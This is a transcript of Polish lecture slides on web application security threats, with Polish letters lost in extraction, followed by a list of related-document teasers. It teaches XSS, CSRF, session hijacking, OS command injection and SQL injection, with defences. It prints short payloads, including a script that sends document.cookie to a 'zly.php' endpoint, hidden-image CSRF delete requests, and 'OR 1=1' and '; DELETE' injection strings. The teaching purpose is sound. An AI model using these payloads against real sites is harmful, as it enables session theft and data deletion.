Zagro enia aplikacji internetowych. Dr in. Marek Mi osz
|
|
- Oskar Kurek
- 8 lat temu
- Przeglądów:
Transkrypt
1 Zagro enia aplikacji internetowych Dr in. Marek Mi osz
2 Plan Aplikacja internetowa Proste zagro enia Ukryte parametry na stronie Manipulacje parametrami (doklejanie, zmiana cie ki) Wstrzykiwanie (ang. Injection) zawarto ci (tre ci, HTML, kodu programowego i SQL) Ataki na sesje (c) M.Mi osz 2
3 Aplikacja internetowa Dynamiczne strony WWW Kod wykonywany na serwerze Manipulowanie danymi przez klienta Wspó praca z serwerem bazy danych i innych us ug Komunikacja z klientem przy pomocy protoko u http (https) Dane pobierane przy pomocy formularzy HTML i przesy ane metod GET lub POST Klient standardowa przegl darka WWW (c) M.Mi osz 3
4 Aplikacja internetowa - architektura Przegl darka.ini Klient Statyczne strony Multimedia Serwer Serwer Aplikacja Programy Serwer aplikacji.ini BD Serwer BD.ini Inne serwery.ini (c) M.Mi osz 4
5 Przyk ady technologii CGI Common Gateway Interface (uruchamianie skryptów zwykle w Perlu, Phyton, PHP czy VB, polece SO) ASP - Active Server Pages (MS, VB Script lub C#); obecni e ASP.NET JSP Java Server Pages J2EE (JSP/ Servlet/EJB) Oracle 9i PHP (c) M.Mi osz 5
6 Wzrost zagro e Powszechna dost pno aplikacji Anonimowi klienci Przeno no oprogramowania Stosowanie standardów (ogólnie znanych) Wysoki poziom abstrakcj i danych Jawno kodu (HTML, JavaScript) Skomplikowane j zyki programowania oraz konfiguracje wykonawcze (np. MySQL serwer + PHP parser + Apache + pliki HTML, CSS i inne) (c) M.Mi osz 6
7 Jeden z problem ów Konieczno utrzymania sesji w bezstanowym pr otokole http Rozwi zania: Ukryte pola w formularzach Parametry wywo ania (stan sesji po stronie serwera, ale Id po stronie klienta) Cookies IP, MAC Wszystko po stroni e klienta ;-( (c) M.Mi osz 7
8 Proste zagro enia Nazewnictwo plików ( atwe do odgadni cia -> pobrania poza aplikacj ), np. form_11.html Stare wersje plików (mo liwo pobrania bez wykonani a; np. plik.jsp a plik.jsp.old) Istotne informacje w komentarzach kodu HTML (automat ycznie wstawiane przez narz dzia, programistów, znaczniki META) <!-- <P align="center"><a href="askbillgates.aspx"> <IMG alt="zapytaj Billa Gatesa!" src="img/askbillgmonitor.jpg" border="0"></a></p> --> (w CodeGuru ;-)) (c) M.Mi osz 8
9 R czne pobranie (c) M.Mi osz 9
10 Badanie rodowiska wst p do ataku Analiza ród a (HEAD, OPTI ONS, META) Analiza zwracanych b dów (np. 404) Analiza komunikatów na nieznany typ pliku (np. asp czy exe) Zmiana danych wej ciowych w celu wywo ania b du skryptu (c) M.Mi osz 10
11 Strona z b dem Error 404 wykladowcy.wspa.edu.pl Wed Jan 2 09:28: Apache (c) M.Mi osz 11
12 Ukryte parametry Zapami tywanie zmiennych po stroni e klienta: <input type="hidden" name="nr" value="3335w" /> Niewidoczne na formul arzach ale widoczne w tek cie ród owym Zapami tywanie istotnych danych -> zagro enie (c) M.Mi osz 12
13 Ukryte parametry - modyfikacja GET adres w przegl darce ( atwa zmiana); warto ci max. 100 znaków; struktura: URL?name=value&name=value POST (dla d ugich warto ci zmiennych lub nie- ASCII): Zapisanie pliku HT ML, zmiana warto ci ukrytego parametru i uruchomienie pliku Zastosowanie lokalnego proxy, modyfikuj cego w locie ruch HTML (c) M.Mi osz 13
14 Lokalne proxy Dzia a lokalnie na stacji intruza Adres i port proxy nale y skonfigurowa w przegl darce Przechwytuje i modyfikuje ruch w locie Najbardziej znany: (zablokowane), ale Odysseus (dost pny min. (c) M.Mi osz 14
15 Doklejanie parametr ów Odgadni cie/podejrzenie nazwy zmiennej Brak inicjacji zmiennej w kodzie Doklejenie jej w linii lub przez proxy Przyk ad: KOD: if (sprawdz_w_bazie($login, $pass)) {$czyok= OK }; if ($czyok == OK ) { JEST OK } else { BŁĄD }; (c) M.Mi osz 15
16 Obs uga sytuacji specjalnych Wszystkie wyj tki/b dy/b dne dane powinny by obs u one przez aplikacj Sytuacja specjalna np. brak parametru lub niew a ciwy format danych parametru lub niew a ciwa warto (poza zakresem) Mo liwo zaburzenia pracy aplikacji (logiki lub unieruchomienie) (c) M.Mi osz 16
17 Cookies (1) Czym s? Pliki tekstowe przechowywane u klienta (konieczno udost pnienia opcji zapisu) Przechowuj (nazwa+warto ) dane: Nazwa ciasteczka Domena Czas wa no ci (uwaga na zegar klienta!) Inne (aplikacja) Zapis na danie serwera: Set-Cookie: nazwa=wartość; expires=data; path=ścieżka; domain=domena; secure Przyk ad: eprawniktrackingd1ca ad8e676db26cc6d1463e5eprawnik.pl/prawo/ * (c) M.Mi osz 17
18 Cookies (2) Cookies powinny by dost pne tylko dla danego serwera (ale...) Mo na przechwytywa i modyfikowa przy pomocy lokalnego proxy Mo na pozyska ID sesji lub domy li si innego ID sesji -> wznowi lub przej sesj Mo na modyfikowa parametry (najcz ciej flaga/status autoryzacji klient a), np.: setcookie( autoryzacja, tak ) Modyfikowa cookies mo na te w przypadku protoko u SSL (lokalne proxy realizuje przej cie, atak man in the middle ) (c) M.Mi osz 18
19 Man in the middle SSL(1) Brak szyfrowania SSL(2) Przegl darka Klient Lokalne proxy Serwer (c) M.Mi osz 19
20 Podszycie si pod sesj Wymagana jest znajomo identyfikatora sesji (tokena) Zwykle w cookie, ale te w parametrze GET/POST lub ukrytym polu w FORM Sk d? Pods ucha Przewidzie Ukra Mo na omin mechanizmy autentykacji klienta przej cie lub wznowienie sesji (np. administratora aplikacji) (c) M.Mi osz 20
21 Token Losowy nieprzewidywalny Ograniczony czasowo by unikn mo liwo ci brutalnego ataku Dostatecznie d ugi - by unikn mo liwo ci brutalnego ataku oraz losowego odgadni cia Zale ny od IP klienta by uniemo liwi wznowienie Szyfrowany (cooki przez SSL) by ograniczy mo liwo przechwycenia (c) M.Mi osz 21
22 Sk d pochodzi? W wi kszo ci przypadków z API (np. parsera PHP): JSESSIONID (JSP), PHPSESSID (PHP), ASPSESSIONID (Microsoft ASP) Niektóre API maj /mia y przewidywalne algorytmy (np. IBM WebSphere 4.0) ;-( (c) M.Mi osz 22
23 Wstrzykiwanie (ang. Injection) Niechciane przekazanie nieoczekiwanych danych do aplikacji Wstrzykni cie: Niechcianej tre ci Kodu HTML/skryptu Polecenia syst emu operacyjne go Polecenia SQL (c) M.Mi osz 23
24 Wstrzykni cie tre ci Wprowadzenie tre ci niepo danej do serwisu (wulgaryzmy, seks, nazi zm itp.) Klasyczny problem ró nego typu forów, ankiet otwartych, ocen produkt ów itp. Walka: R czna moderacja (trudna i kosztowna) Przeszukiwanie s ownikowe (ma o efektywne dla sprytnych wandali) (c) M.Mi osz 24
25 Wstrzykni cie kodu HTML Atak na innego u ytkownika przez napastnika z wykorzystaniem aplikacji internetowej jako nosiciela Istota: Wykonanie kodu HTML (cz sto w po czeniu ze skryptem) przez przegl dark ofiary Mo liwy kiedy aplikacja pobiera dane i je publikuje bez nale ytego sprawdzenia Cross-Site Scripting (XSS) skrypty (klient ufa apl) Cross-Site Request Forgeries (CSRF/XRF) wykorzystanie w a ciwo ci http, pobieranie sk adników strony (apl. ufa klientowi) (c) M.Mi osz 25
26 Proste wstrzykni cie HTML Wykorzystanie znaczników HTML: Przypadkowe zepsucie strony (zapomnienie wsta wienia zamykaj cego znacznika lub znaku spacjalnego) Wykorzystanie <FORM> do pobrania danych od klienta Nieoczekiwane dla klienta przej cia do innej strony: <a href= > Zobacz </a> Wywo anie skryptu bez wied zy administratora (napastnik pozostawia, a admin na swoje sesji uruchami a) - CSRF: <IMG src="admin.php?delete=13"> <IMG style="display: none;" src="admin.php?delete=13"> Ukrycie komunikatu braku obrazu (c) M.Mi osz 26
27 Pomy ka <TR> <TD colspan=2 bgcolor="#ffffcc"> <font size="2"> <b> Pomy ka Wiadomo : <br> </b> <a href=" > co </a></font> </TD> </TR> <TR> <TD colspan=2> <form method="post" name="form2" action="news.php?action=usun " style="font-size: 10px"> Przycisk nieaktywny (c) M.Mi osz 27
28 Rezultat wstawienia <a> (c) M.Mi osz 28
29 Wstrzykiwanie znak ów Wstawianie niedozwolonych znaków do URI (standard: Uniform Resource Identifiers (URI): Generic Syntax, ), URL: Zarezerwowanych: ; /? & = + $, Steruj cych: ENTER, Esc, Null Znaczników: <> Kodowanie procentowe: %cc (c- cyfra heksadecymalna), np. %20 SPACE (ASCII kod: 32), a % koduj e si jako %25 Wielokrotne kodowani e, np. %255c daje / to samo: %25%3 5%63 (c) M.Mi osz 29
30 Wstrzykni cie skryptu Wykorzystanie znaczników <SCRIPT>, <OBJECT>, <A PPLET> czy <EMBED> Przyk ady: Hello World! <SCRIPT>zły kod</script> Hello World! <EMBED SRC=" <A HREF=" SRC=' Go to trusted.org</a> (c) M.Mi osz 30
31 Inne wstrzykni cia z ego kodu Wykorzystanie zdarze w interfejsie: <b onmouseover="self.location.href=' il.org/'"> bolded text</b> Wywo anie b du i zwrot kodu: (c) M.Mi osz 31
32 Przyk ad b du Warning: unlink(/home/wspa/www/wykladowcy.wspa.edu.pl/wykladowc a/pliki/marekm/upload/./nowy_) [function.unlink]: No such file or directory in /home/wspa/www/wykladowcy.wspa.edu.pl/wykladowca/pl iki/marekm/wykladowca.php on line 523 Warning: rmdir(/home/wspa/www/wykladowcy.wspa.edu.pl/wykladowc a/pliki/marekm/upload/./2005-6_sesja_zimowa/) [function.rmdir]: Directory not empty in /home/wspa/www/wykladowcy.wspa.edu.pl/wykladowca/ pliki/marekm/wykladowca.php on line 517 (c) M.Mi osz 32
33 XCC kradzie Cookies Po stronie serwera: <SCRIPT type="text/javascript"> var adr = 'zly.php?ciasteczka=' + escape(document.cookie); var obr = '<IMG src="' + adr + '">'; document.write(obr); </SCRIPT> U klienta (po wykonaniu skryptu): <IMG src= zly.php?ciasteczka=zawartość_cookie > Otwarcie strony powoduje automatyczne przes anie Cookie oraz akcj zly.php (np. zapisanie Cookie oraz odes anie rysunku) Escape() zamienia znaki specjalne na %nn (wys anie URI) Pobranie Cookie Wpisanie warto ci zmiennej obr (c) M.Mi osz 33
34 Atak CSRF na lokaln aplikacj (c) M.Mi osz 34 Shiflett C.: Foiling Cross-Site Attacks, PHP Architect nr 10/2003
35 Wstrzykni cie polecenia SO Aplikacja przekazuje do klienta parametry do wywo ania systemowego: Funkcji API Polecenia SO Je li parametry nie s sprawdzone przed wywo aniem to mo na: Doklei swoje parametry Wywo a swoje polecenie SO (np. exec(), system()) (c) M.Mi osz 35
36 Przyk ad <HTML> <?php passthru ( " /home/user/metoda ". $_GET['USER_INPUT'] );?> Mo na: Wykona polecenie SO (dir, copy czy ld) Wykona ci g polece, wykorzystuj c: Nadpisa plik na serwerze: > plik Ochrona: escapeshellarg() escapeshellcmd() (c) M.Mi osz 36
37 Wstrzykni cie SQL Atak na warstw danych Przyczyna: Brak weryfikacji parametrów przekazywanych od klienta do aplikacji Konstrukcja zapyta SQL poprzez sklejanie statycznego kodu SQL z warto ciami parametrów Przyk ad: $sql= select * from pytania where id=$id ; $wynik = mysql_query($sql); A co je li by o wcze niej: $id=$_get[ user_input ]; I podano: 1 or 1=1 (c) M.Mi osz 37
38 Typowe ataki Niekontrolowany dost p do danych: UNION SELECT Zmiana logiki dzia ania aplikacji: OR 1=1 Wykonanie wielu polece z jednej linii (nie we wszystkich SZBD jest to mo liwe, MS SQL Server - tak) usuni cie, modyfikacja danych (dowolne polecenie SQL): ; DELETE * FROM ; UPDATE (c) M.Mi osz 38
39 Przyk ad Kod: $sql= select count(*) from uwierz where uzytkownik=$uzytkownik. and haslo=$haslo ; Zmienna $uzytkownik= jakis a $haslo z formularza ma warto : OK OR 1=1 Wynikowe zapytanie: select count(*) from uwierz where uzytkownik=jakis AND haslo=ok OR 1=1; (c) M.Mi osz 39
40 GOOGLE hacking (1) Obej cie zabezpiecze przez roboty: [PDF] Projektowanie aplikacji J2EE w architekturze Model-View-Controller Format pliku: PDF/Adobe Acrobat - Wersja HTML JSP. (View). Klasa. zewnętrzna. (Model) Serwlet. (Controller) Rys. 1. Schemat przykładowej aplikacji w architekturze MVC Podobne strony Pobranie 03.pdf i wszystkich: 01.pdf, 02.pdf, Ale y/pdf daje: Forbidden You don't have permission to access /konf_05/materialy/pdf/ on this server. Apache Server at Port 80 (c) M.Mi osz 40
41 GOOGLE hacking ys_problemu Komunikaty b dów: Warning: mysql_query() [function.mysql-query]: Unable to save result set in /www/pasjagsm_www/www/forum/db/mysql4.php on line 148 Critical Error! message_die() was called multiple times. Error #1 Could not obtain common word list Line : 323 File : /www/pasjagsm_www/www/forum/includes/functions_search.php SQL : SELECT word_id FROM phpbb_search_wordmatch GROUP BY word_id HAVING COUNT(word_id) > SQL message: MySQL server has gone away Error #2 Error doing DB query: pw count fetch Line : 1759 File : /www/pasjagsm_www/www/forum/includes/page_header.php SQL : SELECT COUNT(*) AS pw_count FROM phpbb_privmsgs pm WHERE pm.privmsgs_to_userid = 4605 AND pm.privmsgs_type <> 2 GROUP BY pm.privmsgs_to_userid SQL message: MySQL server has gone away Please, contact the Administrator. Thank you. (c) M.Mi osz 41
42 Ochrona aplikacji (1) Ograniczenie odpowiedzi serwera z parametrami klienta (zamiast: Witaj Marek mo na: Witaj U ytkowniku) Ograniczenie d ugo ci odpowiedzi klienta (ograniczenie od strony klienta d ugo ci a cucha ale te sprawdzenie w aplikacji) Filtrowanie i usuni cie gro nych znaków (szczególnie < i >, ale te i, czy ;) ale uwaga na specyficzne kody, np. < to te /x3c, ew. zamiana znaków < na < (w ASP: HTMLEncode() w PHP: htmlentities() ) (c) M.Mi osz 42
43 Ochrona aplikacji (2) Analiza warto ci parametrów wej ciowych (otrzymywanych od klienta) i wyj ciowych (publikowanych na stronie lub zapisywanych do BD) Analiza sk adni i blokowanie niepo danych znaczników, szczególnie <SCRIPT> i <EMBED>, <OBJECT> U ycie metody POST w formularzach Weryfikacja cookies przed u yciem (i kontrola czasu trwania sesji) (c) M.Mi osz 43
44 Ochrona aplikacji (3) Wygenerowanie identyfikatora sesji na stronie wej ciowej i kontrola na pozosta ych, cz sto zawiera sum kontrolna IP klienta, np. i w tym przypadku serwer utrzymuje stan sesji (demarkacja sesji, klient dostarcza ID parametr lub cookie) Dok adna znajomo specyfikacji/standardów sieciowych Precyzyjne ustawienia parametrów serwerów, parserów i SO (c) M.Mi osz 44
45 Ochrona aplikacji - architektura Wprowadzenie kontrolera obs uguj cego ca o komunikacji z klientem Wprowadzenie jednorazowego tokena zapobiega duplikacji przesy anych danych, przechwycenia sesji itp. (musi zaistnie zgodno tokena z wys anym w poprzednim pliku) Separacja warstw: biznesowej i prezentacji, a tak e danych Ukrycie zasobów przed klientem (c) M.Mi osz 45
46 Zabezpiecz swoj aplikacj Wiedza to umo liwi
Zagrożenia trywialne. Zagrożenia bezpieczeństwa aplikacji internetowych. Parametry ukryte. Modyfikowanie parametrów wywołania
Zagrożenia trywialne Zagrożenia bezpieczeństwa aplikacji internetowych Rozwiązania charakterystyczne dla fazy rozwoju opisy rozpoznanych błędów, debugging, komentarze poprzednie wersje plików (cp plik.jsp
Bardziej szczegółowoAjax a bezpieczeństwo aplikacji webowych. Jakub Wierzgała
Ajax a bezpieczeństwo aplikacji webowych Jakub Wierzgała Web 2.0 2 grudnia 2008r. Ajax a bezpieczeństwo aplikacji webowych 2 Web 2.0 Zawartość tworzona przez uŝytkowników Wysoka interaktywność Aplikacja
Bardziej szczegółowoAplikacje webowe w obliczu ataków internetowych na przykładzie CodeIgniter Framework
Uniwersytet Zielonogórski Wydział Elektrotechniki, Informatyki i Telekomunikacji Aplikacje webowe w obliczu ataków internetowych na przykładzie CodeIgniter Framework mgr inż. Łukasz Stefanowicz dr inż.
Bardziej szczegółowoDworakowski. Wojciech. Zagrożenia i metody ataku. Aplikacje internetowe -
Aplikacje internetowe - Zagrożenia i metody ataku Wojciech Dworakowski Agenda Aplikacja internetowa Trywialne zagrożenia Ukryte parametry Brak obsługi błędów Manipulacje parametrami doklejanie parametrów
Bardziej szczegółowoDrobne błędy w portalach WWW
Drobne błędy w portalach WWW Borys Łącki http://www.logicaltrust.net XIX Górska Szkoła Informatyki / Szczyrk, 23-26.06.2008 r. LogicalTrust wyizolowany departament bezpieczeństwa IT Business Consulting
Bardziej szczegółowoCGI i serwlety. Plan wykładu. Wykład prowadzi Mikołaj Morzy. Przykład: serwlety vs. szablony. Implementacja logiki prezentacji
Wykład prowadzi Mikołaj Morzy CGI i serwlety Plan wykładu Metody konstrukcji logiki prezentacji Programy CGI Serwlety Java implementacja korzystanie z nagłówków obsługa zmiennych Cookies obsługa sesji
Bardziej szczegółowoPERSON Kraków 2002.11.27
PERSON Kraków 2002.11.27 SPIS TREŚCI 1 INSTALACJA...2 2 PRACA Z PROGRAMEM...3 3. ZAKOŃCZENIE PRACY...4 1 1 Instalacja Aplikacja Person pracuje w połączeniu z czytnikiem personalizacyjnym Mifare firmy ASEC
Bardziej szczegółowoSpedCust 5 instrukcja instalacji
SpedCust 5 instrukcja instalacji jedno- i wielostanowiskowej Schenker Sp. z o.o. Imię i nazwisko Oddział Miejscowość, data INSTRUKCJA INSTALACJI SpedCust5 Aby zainstalować i uruchomić system niezbędne
Bardziej szczegółowoWymiana du ych plików instrukcja dla klientów Grontmij Polska Sp z o. o.
Wymiana du ych plików instrukcja dla klientów Grontmij Polska Sp z o. o. Ostateczna. Grontmij Polska Pozna, 12.10.12 Autoryzacja Title : Wymiana du ych plików instrukcja dla klientów Grontmij Polska Sp.
Bardziej szczegółowoMicrosoft Windows GDI
Okres 03-10.04.2008 Microsoft Windows GDI W systemie operacyjnym Microsoft Windows wykryto luki w przetwarzaniu plików graficznych o rozszerzeniach WMF oraz EMF udostępnianych na stronach www lub przesyłanych
Bardziej szczegółowoAtaki na aplikacje WWW. Łomem, czy wytrychem? Jak dobrać się do aplikacji WWW
Ataki na aplikacje WWW Łomem, czy wytrychem? Jak dobrać się do aplikacji WWW Ataki na aplikację Ataki na przeglądarkę Ataki na serwer WWW/kontener, etc. Często kombinacja i wiele etapów Którędy do środka
Bardziej szczegółowoThe OWASP Foundation http://www.owasp.org. Session Management. Sławomir Rozbicki. slawek@rozbicki.eu
The OWASP Foundation http://www.owasp.org Session Management Sławomir Rozbicki slawek@rozbicki.eu 28-07-2011 OWASP TOP 10 A1: Injection A2: Cross-Site Scripting (XSS) A3: Broken Authentication and Session
Bardziej szczegółowoMicrosoft Management Console
Microsoft Management Console Konsola zarządzania jest narzędziem pozwalającym w prosty sposób konfigurować i kontrolować pracę praktycznie wszystkich mechanizmów i usług dostępnych w sieci Microsoft. Co
Bardziej szczegółowoepuap Ogólna instrukcja organizacyjna kroków dla realizacji integracji
epuap Ogólna instrukcja organizacyjna kroków dla realizacji integracji Projekt współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka
Bardziej szczegółowoProtokół DHCP. Patryk Czarnik. Bezpieczeństwo sieci komputerowych MSUI 2009/10. Wydział Matematyki, Informatyki i Mechaniki Uniwersytet Warszawski
Protokół DHCP Patryk Czarnik Wydział Matematyki, Informatyki i Mechaniki Uniwersytet Warszawski Bezpieczeństwo sieci komputerowych MSUI 2009/10 Patryk Czarnik (MIMUW) 10 DHCP BSK 2009/10 1 / 18 DHCP ogólnie
Bardziej szczegółowoInstrukcja programu PControl Powiadowmienia.
1. Podłączenie zestawu GSM. Instrukcja programu PControl Powiadowmienia. Pierwszym krokiem w celu uruchomienia i poprawnej pracy aplikacji jest podłączenie zestawu GSM. Zestaw należy podłączyć zgodnie
Bardziej szczegółowoAPI transakcyjne BitMarket.pl
API transakcyjne BitMarket.pl Wersja 20140314 1. Sposób łączenia się z API... 2 1.1. Klucze API... 2 1.2. Podpisywanie wiadomości... 2 1.3. Parametr tonce... 2 1.4. Odpowiedzi serwera... 3 1.5. Przykładowy
Bardziej szczegółowoKonfiguracja poczty. Konfiguracja poczty w Outlook (pakiet Microsoft Office)
Wydruk PDF Strony www: https:///pomoc/hosting/konfiguracja-poczty/konfiguracja-poczty-w-outlookpakiet-microsoft-office-23.html Konfiguracja poczty Konfiguracja poczty w Outlook (pakiet Microsoft Office)
Bardziej szczegółowoZdalne odnawianie certyfikatów do SWI
Zdalne odnawianie certyfikatów do SWI Instrukcja użytkownika Wersja 1.0 Strona 1 Spis treści Wstęp... 3 Dostęp do systemu... 4 Wymagania systemowe... 5 Instalacja certyfikatu użytkownika... 8 Sprawdzenie
Bardziej szczegółowoOpis instalacji systemu Intranet Komunikator
mkomp Systemy Informatyczne Małgorzata Hyla 41-914 Bytom, Plac Żeromskiego 11/7 tel. +48 793-59-59-49 NIP 645-160-80-37 REGON 241529060 Opis instalacji systemu Intranet Komunikator Wersja 2.0 Systemy firmy
Bardziej szczegółowoPracownia internetowa w każdej szkole. Opiekun pracowni internetowej SBS 2003 PING
Instrukcja numer PING Pracownia internetowa w każdej szkole Opiekun pracowni internetowej SBS 2003 PING Poniższe rozwiązanie opisuje, jak zapisywać i odtwarzać obrazy całych dysków lub poszczególne partycje
Bardziej szczegółowoKancelaris - Zmiany w wersji 2.50
1. Listy Kancelaris - Zmiany w wersji 2.50 Zmieniono funkcję Dostosuj listę umożliwiając: o Zapamiętanie wielu widoków dla danej listy o Współdzielenie widoków między pracownikami Przykład: Kancelaria
Bardziej szczegółowoAplikacje WWW Wprowadzenie
Aplikacje WWW Wprowadzenie Beata Pańczyk na podstawie http://www.e-informatyka.edu.pl/ http://wazniak.mimuw.edu.pl/index.php?title=aplikacje_www Plan wykładu Składniki architektury WWW: klient HTTP, serwer
Bardziej szczegółowoRobaki sieciowe. Wstęp Instalacja w systemie Kanały dystrybucji Ogólny schemat Przykłady robaków Literatura
Robaki sieciowe Wstęp Instalacja w systemie Kanały dystrybucji Ogólny schemat Przykłady robaków Literatura Robaki sieciowe: Wstęp Skąd taka nazwa? Słowo robak pochodzi od angielskiego słowa tapeworm tasiemiec.
Bardziej szczegółowoPoniżej instrukcja użytkowania platformy
Adres dostępowy: http://online.inter-edukacja.wsns.pl/ Poniżej instrukcja użytkowania platformy WYŻSZA SZKOŁA NAUK SPOŁECZNYCH z siedzibą w Lublinie SZKOLENIA PRZEZ INTERNET Instrukcja użytkowania platformy
Bardziej szczegółowoAutomatyzacja procesu publikowania w bibliotece cyfrowej
Automatyzacja procesu publikowania w bibliotece cyfrowej Jakub Bajer Biblioteka Politechniki Poznańskiej Krzysztof Ober Poznańska Fundacja Bibliotek Naukowych Plan prezentacji 1. Cel prezentacji 2. Proces
Bardziej szczegółowoPOLITYKA PRYWATNOŚCI SKLEPU INTERNETOWEGO
POLITYKA PRYWATNOŚCI SKLEPU INTERNETOWEGO www.tokyotey.pl 1. Zagadnienia wstępne. 1. Pod pojęciem Serwisu rozumie się stronę internetową znajdującą się pod adresem www.tokyotey.pl wraz z wszelkimi podstronami
Bardziej szczegółowoProjektowani Systemów Inf.
Projektowani Systemów Inf. Wykład VII Bezpieczeństwo Copyrights by Arkadiusz Rzucidło 1 Bezpieczeństwo Bezpieczeństwo związane z danymi Konstrukcja magazynów danych Mechanizmy zapisu i modyfikacji danych
Bardziej szczegółowoINFORMATOR TECHNICZNY WONDERWARE
Informator Techniczny nr 101 16-01-2008 INFORMATOR TECHNICZNY WONDERWARE Konfiguracja systemu Windows Server przy dostępie do Wonderware Information Servera 3.0 poprzez protokół HTTPS oraz zaporę (firewall)
Bardziej szczegółowoAplikacje WWW. Wykład 13. Zagrożenia bezpieczeństwa aplikacji WWW. wykład prowadzi: Maciej Zakrzewicz. Zagrożenia bezpieczeństwa
Wykład 13 Zagrożenia bezpieczeństwa aplikacji WWW wykład prowadzi: Maciej Zakrzewicz Zagrożenia bezpieczeństwa 1 Plan wykładu Przegląd wybranych metod ataków kradzież kodu źródłowego pola ukryte HTML zmienne
Bardziej szczegółowoKrakowska Akademia im. Andrzeja Frycza Modrzewskiego. Karta przedmiotu. obowiązuje studentów, którzy rozpoczęli studia w roku akademickim 2013/2014
Krakowska Akademia im. Andrzeja Frycza Modrzewskiego Karta przedmiotu obowiązuje studentów, którzy rozpoczęli studia w roku akademickim 01/014 Wydział Zarządzania i Komunikacji Społecznej Kierunek studiów:
Bardziej szczegółowoOWASP OWASP. The OWASP Foundation http://www.owasp.org. Cross-Site Scripting. Ryzyko do zaakceptowania? Warszawa, 27 stycznia 2011 Michał Kurek
Cross-Site Scripting Ryzyko do zaakceptowania? Warszawa, 27 stycznia 2011 Michał Kurek Copyright The Foundation Permission is granted to copy, distribute and/or modify this document under the terms of
Bardziej szczegółowoLogowanie do mobilnego systemu CUI i autoryzacja kodami SMS
Logowanie do mobilnego systemu CUI i autoryzacja kodami SMS Dostęp do strony logowania następuje poprzez naciśnięcie odpowiedniego dla rodzaju usługi linku dostępnego na stronie www.bsjaroslaw.pl.: lub
Bardziej szczegółowoSystem Informatyczny CELAB. Przygotowanie programu do pracy - Ewidencja Czasu Pracy
Instrukcja obsługi programu 2.11. Przygotowanie programu do pracy - ECP Architektura inter/intranetowa System Informatyczny CELAB Przygotowanie programu do pracy - Ewidencja Czasu Pracy Spis treści 1.
Bardziej szczegółowoSystem kontroli wersji SVN
System kontroli wersji SVN Co to jest system kontroli wersji Wszędzie tam, gdzie nad jednym projektem pracuje wiele osób, zastosowanie znajduje system kontroli wersji. System, zainstalowany na serwerze,
Bardziej szczegółowoPawel@Kasprowski.pl Języki skryptowe - PHP. PHP i bazy danych. Paweł Kasprowski. pawel@kasprowski.pl. vl07
PHP i bazy danych Paweł Kasprowski pawel@kasprowski.pl Użycie baz danych Bazy danych używane są w 90% aplikacji PHP Najczęściej jest to MySQL Funkcje dotyczące baz danych używają języka SQL Przydaje się
Bardziej szczegółowoTechnologie internetowe Internet technologies Forma studiów: Stacjonarne Poziom kwalifikacji: I stopnia. Liczba godzin/tydzień: 2W, 2L
Nazwa przedmiotu: Kierunek: Informatyka Rodzaj przedmiotu: moduł specjalności obowiązkowy: Sieci komputerowe Rodzaj zajęć: wykład, laboratorium Technologie internetowe Internet technologies Forma studiów:
Bardziej szczegółowoUniwersytet Rzeszowski
Uniwersytet Rzeszowski Interdyscyplinarne Centrum Modelowania Komputerowego Inżynieria oprogramowania Część 1: Tworzenie dokumentacji projektowej Opracował: dr inż. Przemysław Pardel v2.01 2014 1. Dokumentacja
Bardziej szczegółowoemszmal 3: Automatyczne księgowanie przelewów w sklepie internetowym Magento (plugin dostępny w wersji ecommerce)
emszmal 3: Automatyczne księgowanie przelewów w sklepie internetowym Magento (plugin dostępny w wersji ecommerce) Zastosowanie Rozszerzenie to dedykowane jest sklepom internetowych zbudowanym w oparciu
Bardziej szczegółowoTworzenie witryn internetowych PHP/Java. (mgr inż. Marek Downar)
Tworzenie witryn internetowych PHP/Java (mgr inż. Marek Downar) Rodzaje zawartości Zawartość statyczna Treść statyczna (np. nagłówek, stopka) Layout, pliki multimedialne, obrazki, elementy typograficzne,
Bardziej szczegółowoRegulamin Usługi Certyfikat SSL. 1 Postanowienia ogólne
Regulamin Usługi Certyfikat SSL 1 Postanowienia ogólne 1. Niniejszy Regulamin reguluje zasady świadczenia Usługi Certyfikat SSL ( zwanej dalej : Usługa Certyfikat SSL) przez Az.pl Sp. z o.o. z siedzibą
Bardziej szczegółowoSystemy mikroprocesorowe - projekt
Politechnika Wrocławska Systemy mikroprocesorowe - projekt Modbus master (Linux, Qt) Prowadzący: dr inż. Marek Wnuk Opracował: Artur Papuda Elektronika, ARR IV rok 1. Wstępne założenia projektu Moje zadanie
Bardziej szczegółowoPolityka prywatności i wykorzystywania plików cookies w serwisie internetowym mateuszgrzesiak.tv
Polityka prywatności i wykorzystywania plików cookies w serwisie internetowym mateuszgrzesiak.tv I. Postanowienia ogólne 1. Administratorem danych osobowych Klientów jest Spółka Starway spółka z ograniczoną
Bardziej szczegółowoAplikacje internetowe i rozproszone - laboratorium
Aplikacje internetowe i rozproszone - laboratorium Web Services (część 3). Do wykonania ćwiczeń potrzebne jest zintegrowane środowisko programistyczne Microsoft Visual Studio 2005. Visual Studio 2005 jest
Bardziej szczegółowoStandard aplikacji WWW Urzędu Miasta Olsztyna
Standard aplikacji WWW Urzędu Miasta Olsztyna Dokument wydrukowany i nie podpisany jest dokumentem nienadzorowanym. Opracowali: Sprawdzili: Zatwierdzili: Mariola Iciak Andrzej Dziewit Rafał Ruchlewicz
Bardziej szczegółowoKomunikacja w sieci Industrial Ethernet z wykorzystaniem Protokołu S7 oraz funkcji PUT/GET
PoniŜszy dokument zawiera opis konfiguracji programu STEP7 dla sterowników SIMATIC S7 300/S7 400, w celu stworzenia komunikacji między dwoma stacjami S7 300 za pomocą sieci Industrial Ethernet, protokołu
Bardziej szczegółowoCo nowego w systemie Kancelaris 3.31 STD/3.41 PLUS
Ten dokument zawiera informacje o zmianach w wersjach: 3.33, 3.32, 3.31 STD w stosunku do wersji 3.30 STD 3.43, 3.42, 3.41 PLUS w stosunku do wersji 3.40 PLUS 1. Kancelaria Co nowego w systemie Kancelaris
Bardziej szczegółowoProgramowanie w Internecie
mariusz@math.uwb.edu.pl http://math.uwb.edu.pl/~mariusz Uniwersytet w Białymstoku 2018/2019 Co to jest Internet? Warunki zaliczenia Zaliczenie na podstawie opracowanej samodzielnie aplikacji WWW Zastosowane
Bardziej szczegółowoStrona główna góra 4 5 6 8 7 9
Opis wyglądu Strona główna góra 4 5 6 8 7 9 10 3 2 1 14 15 11 12 13 1. Menu sklep 2. Menu działy główne 3. Logo sklepu (templates/images/logo.png) 4. Schowek produktów (schowek daje możliwość klientom
Bardziej szczegółowoProtokół HTTP. 1. Protokół HTTP, usługi www, model request-response (żądanie-odpowiedź), przekazywanie argumentów, AJAX.
